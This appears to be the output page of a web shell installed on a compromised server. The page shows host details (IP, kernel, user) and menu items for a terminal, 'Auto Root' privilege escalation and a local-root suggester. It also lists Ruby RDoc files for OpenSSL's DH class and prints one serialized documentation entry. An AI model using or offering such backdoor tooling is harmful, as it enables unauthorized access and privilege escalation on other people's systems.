Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
OpenSSL /
PKey /
DH /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-DH.ri
2.35
KB
-rw-r--r--
2026-04-07 17:22
compute_key-i.ri
854
B
-rw-r--r--
2026-04-07 17:22
export-i.ri
1006
B
-rw-r--r--
2026-04-07 17:22
generate-c.ri
784
B
-rw-r--r--
2026-04-07 17:22
generate_key%21-i.ri
1.39
KB
-rw-r--r--
2026-04-07 17:22
initialize_copy-i.ri
267
B
-rw-r--r--
2026-04-07 17:22
new-c.ri
1.77
KB
-rw-r--r--
2026-04-07 17:22
params-i.ri
441
B
-rw-r--r--
2026-04-07 17:22
params_ok%3f-i.ri
613
B
-rw-r--r--
2026-04-07 17:22
private%3f-i.ri
460
B
-rw-r--r--
2026-04-07 17:22
public%3f-i.ri
454
B
-rw-r--r--
2026-04-07 17:22
public_key-i.ri
1.08
KB
-rw-r--r--
2026-04-07 17:22
set_key-i.ri
412
B
-rw-r--r--
2026-04-07 17:22
set_pqg-i.ri
369
B
-rw-r--r--
2026-04-07 17:22
to_der-i.ri
753
B
-rw-r--r--
2026-04-07 17:22
to_pem-i.ri
946
B
-rw-r--r--
2026-04-07 17:22
to_s-i.ri
942
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI"public_key:ETI"!OpenSSL::PKey::DH#public_key;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"DReturns a new DH instance that carries just the \DH parameters.;To:RDoc::Markup::BlankLine o; ; [I"GContrary to the method name, the returned DH object contains only ;TI"'parameters and not the public key.;T@o; ; [I"OThis method is provided for backwards compatibility. In most cases, there ;TI"$is no need to call this method.;T@o; ; [I"EFor the purpose of re-generating the key pair while keeping the ;TI"2parameters, check OpenSSL::PKey.generate_key.;T@o; ; [I" Example:;To:RDoc::Markup::Verbatim; [ I"I# OpenSSL::PKey::DH.generate by default generates a random key pair ;TI",dh1 = OpenSSL::PKey::DH.generate(2048) ;TI"2p dh1.priv_key #=> #<OpenSSL::BN 1288347...> ;TI"dhcopy = dh1.public_key ;TI"p dhcopy.priv_key #=> nil;T:@format0: @fileI"$ext/openssl/lib/openssl/pkey.rb;T:0@omit_headings_from_table_of_contents_below0I"dh.public_key -> dhnew ;T0[ I"();T@%FI"DH;TcRDoc::NormalClass00